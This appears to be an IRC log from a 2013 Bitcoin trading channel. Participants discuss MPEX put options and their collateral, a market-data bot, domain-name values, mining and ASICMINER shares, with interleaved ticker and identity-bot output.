[O.BTCUSD.P510T] 1000 @ 0.18817119 = 188.1712 BTC [-] Mar 10 05:21:40 [MPEX] [O.BTCUSD.P490T] 1000 @ 0.16485623 = 164.8562 BTC [-] Mar 10 05:21:43 [MPEX] [O.BTCUSD.P470T] 1000 @ 0.14289205 = 142.8921 BTC [-] Mar 10 05:21:44 holy shi Mar 10 05:21:45 t Mar 10 05:21:57 ;;calc 239+213+188+165+143 Mar 10 05:21:57 948 Mar 10 05:22:17 ;;calc 948*47.8 Mar 10 05:22:17 45314.4 Mar 10 05:22:18 almost 2k bitcoins Mar 10 05:22:22 every time the bot puts up more blocks they're taken out Mar 10 05:22:36 ddos Mar 10 05:22:42 v2.0 Mar 10 05:23:46 mircea_popescu: i have to imagine that your bot buys them as part of a hedging strategy Mar 10 05:23:50 Who's selling that amount of puts... Mar 10 05:23:55 mpoe bot is just marketmaking Mar 10 05:24:52 sorry guys, just a few more tests.. Mar 10 05:25:09 no worries...to be honest, i think you can just turn off showing joins and parts Mar 10 05:25:29 i know you can in colloquy, but not sure about MIRC Mar 10 05:25:49 but thats like turning off 1 satoshi txes Mar 10 05:26:01 u dont do dat. Mar 10 05:26:07 no i didn't mean you Mar 10 05:26:16 in order for that person to "cash out" they need to buy puts back, right? Mar 10 05:26:17 i meant you can send them, but i can not display them Mar 10 05:26:27 no Mar 10 05:26:28 pizzaman1337 yes, or they autoexercise at month end Mar 10 05:26:33 yes true Mar 10 05:26:49 and what exactly happens when they autoexercise? Mar 10 05:27:04 do they always autoexercise? Mar 10 05:27:14 thought they would only do that if they are in the money Mar 10 05:27:34 they probably will just expire worthless Mar 10 05:27:36 $vwap Mar 10 05:27:37 BitOTTer86: http://pastebin.com/KnN9A22z Mar 10 05:27:42 /msg mirceau_popescu Mar 10 05:27:48 wtb Mar 10 05:28:12 but if they expire worthless, than means they made pure profit because they don't have to buy back worthless options? Mar 10 05:28:22 mjr_ well, if they're not in the money they just dissapear Mar 10 05:28:27 pizzaman1337 yes Mar 10 05:28:43 if btc goes to like 55 and stays htere, all the btc he got selling he keeps Mar 10 05:28:49 [BTCTC] [ASICMINER-PT] 1 @ 0.85 BTC [+] Mar 10 05:28:52 if btc goes to 40, he's on the hook for the difference Mar 10 05:29:05 what if the diff is greater than the amount of money he has? Mar 10 05:29:30 you technically expose yourself to unlimited liability when you write options (at least calls) Mar 10 05:30:04 but usually you have to have something to back against the most likely scenario Mar 10 05:31:03 thats why i was wondering the specific collateral requirements Mar 10 05:31:50 With a call, you need to put up 1 BTC collateral so it's always 100% covered Mar 10 05:32:10 but for puts Mar 10 05:32:16 it varies doesn't it? Mar 10 05:32:47 For calls, their value tends toward 1. For puts tho, their value tends toward the infinite. Mar 10 05:33:11 hmmm yes when writing them Mar 10 05:33:13 For example, if price becomes 1/1000 of the put's strike, the put would be worth 1000 BTC Mar 10 05:33:29 If it goes to a lower fraction, even more. Mar 10 05:33:32 i know Mar 10 05:33:45 my point is that since you COULD be on the hook for millions of bitcoins Mar 10 05:33:58 at most 21 Mar 10 05:33:59 how many are required Mar 10 05:34:04 They're not fully covered. It would require infinite BTC. Mar 10 05:34:08 yes Mar 10 05:34:16 but what is the capital requirement Mar 10 05:34:32 pizzaman1337 it can't be, cause he deposits collateral Mar 10 05:34:54 It varies depending on strike and current rate/BTC Mar 10 05:35:10 Namworld they are fully covered, since you do put up enough btc to cover for the put in usd atthe time you write it Mar 10 05:35:21 you put up a little more, which pays for insurance. Mar 10 05:36:08 just for example...let's say the vwap hits $100 Mar 10 05:36:16 and you sold puts at $50 Mar 10 05:36:38 wait reverse that lol Mar 10 05:36:55 ;;48.5 Mar 10 05:36:55 Error: "48.5" is not a valid command. Mar 10 05:37:00 ;;asks 48.5 Mar 10 05:37:00 There are currently 17873.054 bitcoins offered at or under 48.5 USD, worth 863731.319966 USD in total. | Data vintage: 44.7354 seconds Mar 10 05:37:11 massive wall up Mar 10 05:37:32 maybe from the sam guy who sold the puts Mar 10 05:37:37 now to be removed Mar 10 05:37:40 konspiraci Mar 10 05:38:10 mircea_popescu: I think I understand it all, thanks. I'll have to give it a shot sometime. Mar 10 05:38:14 so anyway, let's say the vwap is 50 and you sell puts at 50, the price drops to 25 Mar 10 05:38:18 kakobrekla: but wouldln't that person want the price to increase? Mar 10 05:38:38 yes pizzaman1337, 04:37.38 ( kakobrekla ) now to be removed Mar 10 05:38:43 the ask wall. Mar 10 05:38:56 ah Mar 10 05:38:57 konspiraci! Mar 10 05:38:58 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 10 05:39:24 each contract would be liable for 2 bitcoins right? Mar 10 05:40:31 hmm, 1 BTC actually Mar 10 05:40:32 no ? Mar 10 05:40:59 AActually in my example earlier, I think it should have been 999 BTC Mar 10 05:41:17 1/(x-1) Mar 10 05:41:46 you get your fraction with x and remove 1 to that. Mar 10 05:41:58 Since at strike value, the put has 0 value. Mar 10 05:42:08 yeah Mar 10 05:42:58 my point is just this...if you sold the put, and the price goes up 10x Mar 10 05:43:38 put is worth 0 so 0 collateral is eaten. Mar 10 05:43:43 yes Mar 10 05:43:51 but if it drops to 0 Mar 10 05:44:03 You have infinity BTC value Mar 10 05:44:10 i think i see what mircea was saying Mar 10 05:44:18 So you must pay an infinity of worthless BTC... Mar 10 05:44:18 you can only write covered options, no naked Mar 10 05:44:29 yes exactly Mar 10 05:44:36 "You don't hold enough assets to trade even one single unit of that MPSIC. Sad, sad, sad." < lulz Mar 10 05:44:53 lol Mar 10 05:45:22 fortunately because btc is small and fiart is large it is kinda trivial for me to insure against that Mar 10 05:45:29 yes Mar 10 05:45:32 so if btc goes to zero outstanding puts just get setrtled in fiat Mar 10 05:45:34 and that's that. Mar 10 05:45:46 yeah Mar 10 05:45:48 anyway if btc is zero nobody would want to be settled in btc Mar 10 05:46:01 except you pay infinity x 0 USD per BTC... Mar 10 05:46:46 i am going to do some exploring on a pairs strategy Mar 10 05:46:50 if the price is 0.01 and strike is 1, you pay 99 BTC at 0.01 cent each... Mar 10 05:47:20 The lower the price goes, the more you owe. But the less the BTC costs to cover those larger BTC amounts. Mar 10 05:48:31 basically a p500 can never cost more than 50 bucks Mar 10 05:48:34 whatever that comes to Mar 10 05:49:35 although that is true... Mar 10 05:49:47 technically if you need btc in order to unwind your position Mar 10 05:49:56 and have to buy it on the open market Mar 10 05:50:11 someone would have to sell it Mar 10 05:50:25 and if you are obligated to buy a lot Mar 10 05:50:35 price goes up and put is no longer under water Mar 10 05:50:36 you could be pushing the price up Mar 10 05:50:42 it's a self limiting issue Mar 10 05:50:42 yep Mar 10 05:51:05 !help Mar 10 05:51:06 List of commands: Mar 10 05:51:07 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 10 05:51:08 !mp (desc: returns the response from MPEX order) Mar 10 05:52:10 i was going to say that the other possibility is that you can cover the position very easily with another option Mar 10 05:52:23 if you sell one call for every put Mar 10 05:53:10 i meant buy a call for each put sold Mar 10 05:54:53 $depth Mar 10 05:54:56 BitOTTer501: http://pastebin.com/gV101v9A Mar 10 05:55:11 hmm, ok well anyway, it works, kinda. Mar 10 05:55:19 needs more work, but gotta run for now lol Mar 10 05:58:03 i was just looking at the last one, really great job mod6 Mar 10 05:59:08 Hey is it ontopic to discuss pricing of bitcoin denominates securities in this channel? Mar 10 05:59:44 mostly wondering about ASICMINER share and their passthrough derivates. Mar 10 06:00:46 lol its all we talk about really Mar 10 06:01:05 excellent!! Mar 10 06:01:06 that and porn Mar 10 06:01:20 wow, thx mjr_ :} Mar 10 06:01:27 bitcoin is finance porn Mar 10 06:01:51 bitcoin is disruptive tech porn Mar 10 06:01:56 mod6: no prob, it is really really cool Mar 10 06:01:58 so, I cleaned up the dir a bit on github, got rid of bitotter_vwap.pl and bitotter_depth.pl and its merged into this now: https://github.com/modsix/bitotter_perl/blob/master/bitotter_market_data.pl Mar 10 06:01:59 totally Mar 10 06:02:01 but yes, that too Mar 10 06:02:28 right on heheh. its awesome just to see it work, kinda lol Mar 10 06:03:00 whats interesting is that we are sending our GET requests via irc Mar 10 06:03:19 and retrieving a dynamic web page at a different address Mar 10 06:03:24 i think that is really cool Mar 10 06:03:27 oh, so the bummer so far is... i maybe shouldn't have done a commit in there and had left those files to be still able to interface with mpex or a proxy in a way thats outward facing... if that ever happens again Mar 10 06:03:38 cause with that, it was still tor capable Mar 10 06:04:04 so i'll probably just re-introduce those files if/when that happens so tor may be utililzed Mar 10 06:04:41 so back when btw rallied from zero to about 10 it caught my attention… and I made a decision to invest in gnu mining gear. by the time I got my gear up and running it had spiked up to to 30+ and then crashed… I ran my rigs at a loss for almost a year, but when the algorithm changed, I decided that investing the wrk to reprogram them was a loser and shut it all down.. I managed to hang onto a minuscule 500 b Mar 10 06:04:41 though.. Mar 10 06:04:46 i kinda thought that maybe you could host the website on tor with no order functionality Mar 10 06:05:17 anyway, just thought yall should know what was happening. Mar 10 06:05:23 held it fallow for the past year or so… but the recent spike in price got me wondering if spinning up made sense (I decided no since the a sic stuff is imminent) Mar 10 06:05:25 mjr_: that is pretty neat-o huh :) Mar 10 06:05:38 well Mar 10 06:05:49 do you get cheap electricity bgupta? Mar 10 06:05:50 mod6 tor is coming i think. Mar 10 06:06:24 bgupta btw = btc, gnu = gpu ? Mar 10 06:06:39 and when did the algo change ?! Mar 10 06:06:56 mircea_popescu: also i can host a mirror if you like...it will be pretty tough for them to take out a GAE instance Mar 10 06:06:56 ok, i'll reintroduce those files with needed changes as that approches. that'll be awesome Mar 10 06:07:02 In the past no, unfortunately…. now… I have a partner willing to pay electricity if I provide hardware and we split proceeds 50/50.. I think it's a loser for him though.. mircea_popescu yes sorry not reading what I am typing.. Mar 10 06:07:20 mjr_ they already have, three times. and amazon x2 Mar 10 06:07:26 i have basically only accessed mpex over tor since you moved it all over to that early last year Mar 10 06:07:29 its always been fast for me Mar 10 06:08:04 if by hardware you mean gpus bgupta it's a loser for him. and prolly for you too. Mar 10 06:08:24 well...not really for him, if he alrady has the hardware Mar 10 06:08:29 well… they are paid for… so not really Mar 10 06:08:37 he will just get to keep half of the small number of bitcoins he gets Mar 10 06:09:09 the loss will be a day of my time figuring out how to setup the softare Mar 10 06:09:16 any amt of satoshi will be signifigant eventually Mar 10 06:09:21 i thought you already had it running? Mar 10 06:10:18 i am debating installing visual studio 2012 on my home computer Mar 10 06:10:19 I had it running was paying way to much for hosting in a real datacenter.. so shut it down last april when they changed the algorithm,, Mar 10 06:10:33 what do you mean changed the algorithm? Mar 10 06:10:48 if you mean when the pay rate halved Mar 10 06:10:53 mmm… existing miners had to upgrade the software.. Mar 10 06:10:55 no Mar 10 06:11:08 let me see if i can find the deets Mar 10 06:11:22 upgrading version? Mar 10 06:12:05 yeah bitcoind changed… and all pools and miners had to upgrade Mar 10 06:12:42 network is mining blocks like crazy Mar 10 06:13:01 my pool at the time didn't upgrade and shutdown.. and since I was losing close to 50% at the time (due to the ridiculously low price of btw at the time) I followed them Mar 10 06:13:25 !ticker m.dice Mar 10 06:13:25 Have you got any tobacco? Mar 10 06:13:38 !ticker s m.dice Mar 10 06:13:38 You had the last Philistine. This one's mine. Mar 10 06:13:53 I probably mined close to 10k coins while I had my rigs up.. but only managed to walk away with 500 btw after all was said and done.. Mar 10 06:13:57 !ticker m s.dice Mar 10 06:13:58 [MPEX:S.DICE] 1D: 0.00549999 / 0.00549999 / 0.0055 (1650 shares, 9.07 BTC), 7D: 0.00300001 / 0.00558182 / 0.006225 (392080 shares, 2,188.52 BTC), 30D: 0.00300001 / 0.00616213 / 0.0069 (3732757 shares, 23,001.76 BTC) Mar 10 06:14:10 err btc not btw Mar 10 06:14:20 don'w know why I keep doing the same type Mar 10 06:14:22 typo Mar 10 06:14:38 mhm. what will happen to SR when mt gox stops their service to NA Mar 10 06:14:47 SR? Mar 10 06:14:56 Guessing NA is north america? Mar 10 06:15:00 Anywaym I'm out. Goodbye Mar 10 06:15:12 goodnight Mar 10 06:15:53 Bowjob ^^ Mar 10 06:16:07 ooooo Mar 10 06:16:09 yea\ Mar 10 06:16:18 SR is satoshi dice? Mar 10 06:16:33 SR is silk road, SD is satoshi dice Mar 10 06:16:37 ahh... Mar 10 06:16:37 anyone here selling off some of their btc and buying something crazy? or are we all just holing untill $1000 plus? Mar 10 06:16:52 bought ASICs Mar 10 06:17:08 Chaang-Noi: im thinking about turnign some asicminer into a truck Mar 10 06:17:18 I am willing to sell my premium domain for 4000 btc.. Mar 10 06:17:34 it better start with mt. and and with gox Mar 10 06:17:36 if its that much Mar 10 06:17:39 whats the domain Mar 10 06:17:43 nah just vj.com Mar 10 06:17:58 dub i did that already, traded my car in and got a truck Mar 10 06:18:44 If it was USD I'd want a bit more, but it is a digital only transaction, so I'm willing to do it for a little less Mar 10 06:19:00 unfortunately the folks that would be interested don't deal in btc Mar 10 06:19:28 Quick question in the flow… Are BitFunder, btct.co and apex the main securities exchanges ATM? Mar 10 06:19:30 how much did you buy that site for? Mar 10 06:19:54 $0… registered it before they charged for registering domains.. Mar 10 06:20:10 cool, why not get more then? Mar 10 06:20:18 been paying whatever a year for the standard domain registration.. Mar 10 06:21:00 im sure its a good name but you are going to have to hit the right people to get that much out of it Mar 10 06:21:21 i guess it is reasonable though Mar 10 06:21:24 well I had it appraised for $250,000.. but to sell it, i'd need to put a lot of time into adverttising, and likely need to retain a domain broker.. and then take a huge hit on taxes.. Mar 10 06:21:54 realistically if I tried I could probably pocket close to $200,000 Mar 10 06:22:09 It's the most valuable thing I own, and it goes up about 7% a year in value Mar 10 06:22:17 (Well other than my apt) Mar 10 06:22:50 my friend who owns an it consulting company said that that is his biggest regret Mar 10 06:22:53 It's a fallow asset.. Mar 10 06:22:54 bgupta mpex is, yes. Mar 10 06:23:16 and wth, it boggles that anyone'd pay 200k for a domain. Mar 10 06:23:20 i certainly wouldn't. Mar 10 06:23:38 well not an individual for sure.. Mar 10 06:23:45 companies Mar 10 06:23:49 think startup or large company Mar 10 06:23:53 with tons of users Mar 10 06:24:01 200k is not much for a big company Mar 10 06:24:07 that's besides thew point. Mar 10 06:24:11 200k isn'r much for me, either Mar 10 06:24:12 they don't even allow people to register two letter domains any more. Mar 10 06:24:17 but it is very much for a domain Mar 10 06:24:20 which is what we're discussing. Mar 10 06:24:30 i meant as part of a budget involving web presence Mar 10 06:24:38 even so. Mar 10 06:24:41 memorable domains are getting harder to come by... Mar 10 06:24:50 that is a scarce resource Mar 10 06:24:55 eh get out Mar 10 06:25:01 it never was scarce, it's never gettingscarce. Mar 10 06:25:06 when i was looking into getting a domain name for my site Mar 10 06:25:10 huh? Mar 10 06:25:13 seriously. Mar 10 06:25:15 ad buys are made by advertisers Mar 10 06:25:21 they don't think like that Mar 10 06:25:23 it is hard to get a one word domain Mar 10 06:25:28 ya, they think like stupid. Mar 10 06:25:35 no "memorable domain" has a site worth anything on it. Mar 10 06:25:41 all the good sites are on new names Mar 10 06:25:42 google Mar 10 06:25:43 twitter Mar 10 06:25:44 mpex Mar 10 06:25:44 etc. Mar 10 06:25:47 amazon Mar 10 06:25:48 and getting those domains Mar 10 06:25:58 would be expensive Mar 10 06:26:00 amazon is only memorable because of amazon Mar 10 06:26:01 coca cola's ad company isn't smart enough for that shit Mar 10 06:26:05 i hold tygrr.com and bitcoins.lc not really worth a whole lot. Mar 10 06:26:11 they're herd followers Mar 10 06:26:14 worse than traders Mar 10 06:26:14 i got btcshares.com Mar 10 06:26:14 and litecoin.me :) Mar 10 06:26:26 btc-etf.com Mar 10 06:26:42 point in case : btc.com Mar 10 06:26:49 gone Mar 10 06:26:49 did any of the large btc players bother with it ? nope. Mar 10 06:26:53 well... whoopdedo. why not ? Mar 10 06:27:13 bitcoins are still very new Mar 10 06:27:22 forget that. Mar 10 06:27:24 i bet that domain will be very valuable in the future Mar 10 06:27:30 there's people in btc that can afford 200k for a domain. Mar 10 06:27:35 of course Mar 10 06:27:42 btc.com is a porn site oh lol Mar 10 06:27:43 i bet it will be very valuable in the sense 10 bucks are very valuable. Mar 10 06:27:46 brain trust company Mar 10 06:27:53 their capital is best put to work in profitable ventures Mar 10 06:27:59 right. Mar 10 06:28:04 Chaang-Noi some bs wannabe japanese co. Mar 10 06:28:05 well we are a bit different in that we use irc and weirdly named forums for most of our info. we seek out knowledge Mar 10 06:28:07 btc.com is too generic, like dollar.com Mar 10 06:28:19 you don't want that for a brand Mar 10 06:28:26 dub yet bitcoin.com was all the bruhaha Mar 10 06:28:30 yeah the problem with too generic is they aren't trademarkable. Mar 10 06:28:50 which means you can't build a company or a brand around them Mar 10 06:28:57 e.g business.com Mar 10 06:29:06 sex.com Mar 10 06:29:24 sex.com sold for $14mn in 2010 Mar 10 06:29:28 http://bits.blogs.nytimes.com/2007/07/26/businesscom-sold-for-345-million/ look what it's being used of now Mar 10 06:29:31 pretty generic:) Mar 10 06:29:44 wankery Mar 10 06:29:46 lotteries Mar 10 06:29:55 http://en.wikipedia.org/wiki/Domain_name#Resale_of_domain_names Mar 10 06:29:56 i'm just saying Mar 10 06:30:01 spend your energy on creating value Mar 10 06:30:05 insure.com for $16mn Mar 10 06:30:07 capture a small fraction Mar 10 06:30:12 don't wager with your life work Mar 10 06:30:16 typically we think of being creative Mar 10 06:30:23 man up and use it for a shock site tbh Mar 10 06:30:29 yeah.. I've been holding it, because one day when I do a startup, I want a unique domain name to do it with. Mar 10 06:30:44 but that is way harder for some people than just throwing money at stuff Mar 10 06:30:48 lolwut Mar 10 06:31:05 that domain's taking up too much of your brainspace Mar 10 06:31:06 seriously Mar 10 06:31:12 not you mjr_ Mar 10 06:31:14 i know Mar 10 06:31:27 i am just saying that domains are valuable, cuz people want them Mar 10 06:31:27 if you're wasting cycles on thinking about domains Mar 10 06:31:27 sex.com sold for $14mn in 2010 << and it never generated 1mn of revenue in its entire lifetime Mar 10 06:31:50 bgupta i simply don't believe the sort of bs Mar 10 06:31:51 you're not going to be successful in running your own business Mar 10 06:32:04 sex.com made shit loads on money? Mar 10 06:32:06 i am aware the domain name scam people are really working hard to make their coolaid credible Mar 10 06:32:07 of Mar 10 06:32:08 not in a high-competition, high-growth, environment Mar 10 06:32:13 benkay: that is the point, most people do not want to own their own business Mar 10 06:32:15 but a ny times blog hit is nothing in this discussion. Mar 10 06:32:18 345mn didn't happen Mar 10 06:32:24 i get it man, i get it Mar 10 06:32:25 The reality is google kinda made domain names less relevant.. that and the fact that browsers changed how they deal with stuff you type into the address bar. Mar 10 06:32:53 doesn't mean i don't think that putting it all on a specific slot on the fucking roulette table is a good idea Mar 10 06:33:00 yeah for most people google is the address bar Mar 10 06:33:02 bgupta++ Mar 10 06:33:10 i infrequently type domains Mar 10 06:33:16 yeah Mar 10 06:33:28 the way to go is just invent a name and use that as your tm and domains Mar 10 06:33:29 it's like gm Mar 10 06:33:46 yep, and remember bookmarks? lol Mar 10 06:33:49 bi Mar 10 06:34:06 point is that if I worked really hard I could sell it for $200,000, or if I worked even harder, I could build a kick ass business with a cool domain name that's easy to type.. I have time for neither atm. Mar 10 06:34:08 ca Mar 10 06:34:23 aren't there things you'd enjoy working on more? Mar 10 06:34:34 i mean Mar 10 06:34:34 if someone flush with btw wanted to take it off my hands I'd be cool.. but that's a side bar.. Mar 10 06:34:37 i'm tired of hustling Mar 10 06:34:53 it's fucking nice to build stuff people value enough to cut checks for Mar 10 06:35:01 Yeah sure.. I run a LUG.. which I LOVE. Mar 10 06:35:04 its probably worht throwing a thread up about it Mar 10 06:35:16 no sarcasm? Mar 10 06:35:21 I do OSS stuff, love that too Mar 10 06:35:28 what's your profit center? Mar 10 06:35:29 the great thing about bitcoin is there is no shortage of idiots, some with too much money Mar 10 06:35:39 my profit center? Mar 10 06:35:42 true of any market of a reasonable size Mar 10 06:35:46 trivial conclusion Mar 10 06:35:48 dub: yep, the market fixes that situation Mar 10 06:36:13 I do consulting which is a brutal business. Mar 10 06:36:13 meh Mar 10 06:36:24 what space? Mar 10 06:36:30 it's fucking nice to build stuff people value enough to cut checks for << this. Mar 10 06:36:30 cloud shit Mar 10 06:36:52 how brutal? Mar 10 06:37:32 mmm.. to make a dollar you need to sell a body, brutal.. no real leverage, no real product. Mar 10 06:37:57 tis potentially a nice way for someone to cash out $200k of btc too Mar 10 06:38:23 mircea_popescu: the best part is that everything i get checks for, i also learn new skills that multiply my rate Mar 10 06:38:24 dub what forum would I post it to if I wanted to pursue? Mar 10 06:39:01 bgupta: the bitcointalk market or auction forums Mar 10 06:39:16 benkay: I run a small consulting company.. it's not just me… so most of my time is spent doing business stuff not learning Mar 10 06:39:33 i've seen that happen man Mar 10 06:39:38 i've done plenty of consulting and it was always fun Mar 10 06:39:40 what the heck. Mar 10 06:39:46 i've never seen someone run the shop and still make commits Mar 10 06:40:01 i love it Mar 10 06:40:09 stupid parents took my piano away Mar 10 06:40:21 "Japan needs to face up to reality, and take real steps to correct its mistakes... so as to prevent a further escalation," Mar 10 06:40:26 the chinese are about to bitchslap them Mar 10 06:40:27 The one thing I do like about it is the flexibility... Mar 10 06:40:43 flex is nice Mar 10 06:40:48 i get to bill anywhere i am Mar 10 06:40:55 boss-folks like to see my face from time to time Mar 10 06:41:00 I get to pick my priorities.. Mar 10 06:41:08 but it's part of my mystique that i show up at the office kind of randomly Mar 10 06:41:14 been growing my lug and getting some pretty cool speakers.. Mar 10 06:41:35 what's the appeal in the lug? Mar 10 06:41:52 this is the next event: http://www.meetup.com/nylug-meetings/events/82181872/ Mar 10 06:42:00 benkay: I had that at ibm, nobody (besides customers) had any clue what I did Mar 10 06:42:14 big bluuuuue Mar 10 06:42:19 corporate honky Mar 10 06:42:21 ;) Mar 10 06:42:31 and this is the one after: http://www.meetup.com/nylug-meetings/events/102722692/ Mar 10 06:42:53 and even cooler this is the one after that: http://www.meetup.com/nylug-meetings/events/82181952/ Mar 10 06:43:08 I get to onsite awesome folks to NYC to talk to a bunch of geeks Mar 10 06:43:18 that is pretty neat Mar 10 06:43:22 s/onsite/invite/ Mar 10 06:43:30 afk for 5 smoke.. Mar 10 06:43:38 that's a lot... Mar 10 06:45:07 btc crashing Mar 10 06:45:13 lmao no way Mar 10 06:45:15 ;;ticker Mar 10 06:45:15 BTCUSD ticker | Best bid: 47.30215, Best ask: 47.30587, Bid-ask spread: 0.00372, Last trade: 47.30215, 24 hour volume: 50842.40617608, 24 hour low: 43.60001, 24 hour high: 47.95000, 24 hour vwap: 46.10288 Mar 10 06:45:22 http://coinlab.com/ Mar 10 06:45:25 it was 46.60 Mar 10 06:45:26 lol Mar 10 06:45:40 by "crashing" i mean volatility Mar 10 06:45:40 lol Mar 10 06:49:56 always volitile Mar 10 06:50:03 nbd Mar 10 06:50:49 so the real reason I can into this channel was to ask what folks think about ASICMINER shares, and the passthrough variants. Mar 10 06:51:34 I perhaps overshared, and for that I apologize, I;m a bit too open that way. Mar 10 06:52:02 ;;ident jborkl Mar 10 06:52:03 Nick 'jborkl', with hostmask 'jborkl!~jborkl_@unaffiliated/jborkl', is not identified. Mar 10 06:52:06 jarpiain jborkl jborkl_ jcpham JimmyHo3 jurov JWU42 Mar 10 06:52:08 I've not looked at numbers for asicminer but I've met people at meet ups that seem to like it alot Mar 10 06:52:08 ;;get info jborkl Mar 10 06:52:09 Error: The command "get" is available in the Dunno, Herald, and Topic plugins. Please specify the plugin whose command you wish to call by using its name as a command before "get". Mar 10 06:52:14 ;;getinfo jborkl Mar 10 06:52:15 Error: "getinfo" is not a valid command. Mar 10 06:52:21 ;;gpginfo jborkl Mar 10 06:52:21 Error: "gpginfo" is not a valid command. Mar 10 06:52:24 what the fuck Mar 10 06:52:41 ;;ident jborkl Mar 10 06:52:41 Nick 'jborkl', with hostmask 'jborkl!~jborkl_@unaffiliated/jborkl', is not identified. Mar 10 06:52:51 ;;getrating jborkl Mar 10 06:52:51 This user has not yet been rated. WARNING: Currently not authenticated. Mar 10 06:53:05 hmm, let me auth Mar 10 06:53:07 trying to value the shares, as they are starting to climb… faster than I can transfer btc out of mtgox (which is where has been my wallet for the past year.) Mar 10 06:53:24 am I idented? Mar 10 06:53:47 I set that up ages ago… not sure if it's enabled Mar 10 06:53:54 ;;ident bgupta Mar 10 06:53:54 Nick 'bgupta', with hostmask 'bgupta!~bgupta@207-237-250-126.c3-0.80w-ubr1.nyr-80w.ny.cable.rcn.com', is not identified. Mar 10 06:54:02 bgupta https://bitcointalk.org/index.php?topic=151265.msg1605413#msg1605413 if you mean asicminer Mar 10 06:55:27 thanks for the link will read.. Mar 10 06:55:58 [BTCTC] [B.YABMC] 10 @ 0.01398 = 0.1398 BTC [+] Mar 10 06:56:02 ;;ident jborkl_ Mar 10 06:56:03 Nick 'jborkl_', with hostmask 'jborkl_!~jborkl@unaffiliated/jborkl', is not identified. Mar 10 06:56:06 [BTCTC] [B.YABMC] 1 @ 0.01599 BTC [+] Mar 10 06:56:09 [BTCTC] [B.YABMC] 18 @ 0.01999 = 0.3598 BTC [+] Mar 10 06:56:39 so one thing I discovered is once the initial asicminer investors have been paid dividends drop by half.. since the real investors own half of the whole thing. Mar 10 06:56:51 ;;ident jborkl Mar 10 06:56:51 Nick 'jborkl', with hostmask 'jborkl!~jborkl_@unaffiliated/jborkl', is identified as user jborkl_, with GPG key id 3ABA925F1676E0DA, key fingerprint BEDA499D84B3F11FAC2C98C13ABA925F1676E0DA, and bitcoin address 1assBEfKxpuhv3HdYfQwf9h2TR43DwVke Mar 10 06:57:20 considering initial investors bought shares at ~0.1btc that should happen sooner than later Mar 10 06:58:05 Fuck Mar 10 06:58:09 I'm mad Mar 10 06:58:19 ... stupid fucking parents taking my piano downstairs Mar 10 06:58:21 bpjhwsipghsipfghipaefghiaef Mar 10 07:00:19 firstworldproblems Mar 10 07:00:35 mircea_popescu: Without asking you to divulge too much roughly what part of the world are you in? Mar 10 07:00:43 http://bitbet.us/bet/274/bernard-hopkins-vs-tavoris-cloud-hopkins-to-win/ Mar 10 07:00:46 lol Mar 10 07:00:50 whoa hopkins won by like, 1 Mar 10 07:00:58 bgupta timisoara Mar 10 07:01:10 i swear i have rage building right now Mar 10 07:01:13 fuck Mar 10 07:02:01 very cool... Mar 10 07:02:21 Bowjob.. go deal. Mar 10 07:02:30 be sweet Mar 10 07:04:24 mircea: Is there a way to buy straight up shares of asicminer, without doing passthrough stuff? Mar 10 07:04:36 err: mircea_popescu ^^ Mar 10 07:04:41 no. they blew their mpex listing. Mar 10 07:05:01 what does that mean they "blew a listing" Mar 10 07:05:15 delisted? Mar 10 07:05:20 nah, just, failed to list. Mar 10 07:05:29 blew their chance? Mar 10 07:05:45 I feel so violated.. that piano is my personal one Mar 10 07:05:49 think of it in these terms : company pops up, doesn't list on nyse, lists on pink sheets Mar 10 07:05:54 theres a second piano downstairs that i do not care about Mar 10 07:05:55 through a weird agreement they don't sign Mar 10 07:05:57 it's a little lala Mar 10 07:06:13 ok.. Mar 10 07:06:40 SO the muse thing that everyone bitches about the 30btc thing.. that's just a one time thing, no? Mar 10 07:07:08 Bowjob: 1%problems Mar 10 07:07:10 yes. Mar 10 07:07:11 s//muse/mpex/ Mar 10 07:07:34 ok.. that would make trading difficult for me if it was a trading cost. Mar 10 07:07:37 "everyone". hm. it's more of a "everyone that's bitching about it is bitching about it". Mar 10 07:07:38 bgupta: there are lots of otc asicminer trades happening, check the auction forum Mar 10 07:07:45 obviously those that don't bitch don't bitch. Mar 10 07:08:15 bgupta: friedcat (asicminer guy) is timely about transferring etc Mar 10 07:08:19 but yes, there's a large assignment market in it too, otc. Mar 10 07:08:33 well...large. 100s of btc or so Mar 10 07:09:07 err.. lot me clarify "everything that bitches" means "everyone that bitches about mpex"… I believe that's the biggest complaint. and I'm ok with it… Mar 10 07:09:37 i thought the biggest complaint was that i'm not nice. Mar 10 07:10:10 I am ready to buy sink 300 some odd btw into asicminer.. these penny-ante exchanges aren't quite cutting it. Mar 10 07:10:30 ohh.. you are mpex? Mar 10 07:10:46 very cool. sorry for being oversharing. Mar 10 07:11:14 (Realising that 300 btw is penny-ante) Mar 10 07:11:17 btc Mar 10 07:11:17 what's oversharing ? Mar 10 07:11:38 the sharing of internet complaints.. Mar 10 07:11:38 I'll warn them next time they try to pull this shit again, I will yell at them so that all the guests will hear it. Mar 10 07:11:59 lol that's not a problem, the internet was born to kvetch Mar 10 07:12:59 anyway. it's a gamble on multiple scores. Mar 10 07:13:02 mircea_popescu: are your trades listed publicly? IE: do I need to buy in to see traffic? Mar 10 07:13:11 nope. it streams here for one. Mar 10 07:13:15 fuck it's all a gamble Mar 10 07:13:19 opps Mar 10 07:13:23 all the earlier excitement about the trading puts for instance Mar 10 07:13:38 twitter.com/mpex1 or you could just follow the twitter. Mar 10 07:13:44 there's also a rss but atm unavailable. Mar 10 07:15:03 Ohhhh… was gonna ask what these things are.. Mar 10 07:15:36 me hates me some derivatives. (unless of course.. I am issuing them) Mar 10 07:15:37 puts for this month around 50usd/btc Mar 10 07:16:05 you can issue, sure. ths person was selling short. Mar 10 07:16:22 mircea: I am looking for a "stock exchange" Mar 10 07:16:36 mpex does shares, options, futures Mar 10 07:16:43 the whole thing Mar 10 07:17:00 http://mpex.coinbr.com/ ?? Mar 10 07:17:08 techbnically speaking options are securities anyway Mar 10 07:17:19 that;s a proxy. Mar 10 07:17:21 err Ok I like equity Mar 10 07:17:24 currently dead. Mar 10 07:17:44 $vwap Mar 10 07:17:46 mircea_popescu: http://pastebin.com/d6AS1y6d Mar 10 07:17:54 there, that's a list of what traded past month Mar 10 07:18:08 JSON? Mar 10 07:18:11 yes Mar 10 07:18:11 ok Mar 10 07:18:42 grep S\. for shares Mar 10 07:18:44 ie equity Mar 10 07:19:19 json is human readable.. but… I need to whip out cli shit to deal.. one moment.. (I'm slow) Mar 10 